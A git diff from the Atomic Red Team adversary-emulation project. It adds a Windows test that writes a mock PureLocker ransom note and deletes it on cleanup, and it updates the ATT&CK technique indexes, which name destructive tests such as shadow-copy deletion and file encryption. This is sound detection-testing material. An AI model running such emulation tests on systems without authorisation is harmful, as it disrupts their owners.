.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 8f50e385..f727969f 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -602,6 +602,7 @@ impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce08 impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash +impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index a91df23f..cfb7be52 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -416,6 +416,7 @@ impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f8 impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell +impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 1fa4db89..62d2f1af 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1070,6 +1070,7 @@ - Atomic Test #2: Encrypt files using 7z (Linux) [linux] - Atomic Test #3: Encrypt files using ccrypt (Linux) [linux] - Atomic Test #4: Encrypt files using openssl (Linux) [linux] + - Atomic Test #5: PureLocker Ransom Note [windows] - T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index ffb97ef0..12ae449e 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -770,7 +770,8 @@ - T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1485 Data Destruction](../../T1485/T1485.md) - Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows] -- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1486 Data Encrypted for Impact](../../T1486/T1486.md) + - Atomic Test #5: PureLocker Ransom Note [windows] - T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index 44c424f0..5cb56258 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md @@ -5,7 +5,7 @@ | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | -| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index e789dbe4..c4351d9f 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -47406,6 +47406,21 @@ impact: cleanup_command: | $which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path} rm #{encrypted_file_path} + - name: PureLocker Ransom Note + auto_generated_guid: 649349c7-9abf-493b-a7a2-b1aa4d141528 + description: "building the IOC (YOUR_FILES.txt) for the PureLocker ransomware + \nhttps://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/\n" + supported_platforms: + - windows + executor: + name: command_prompt + elevation_required: true + command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt + +' + cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 + +' 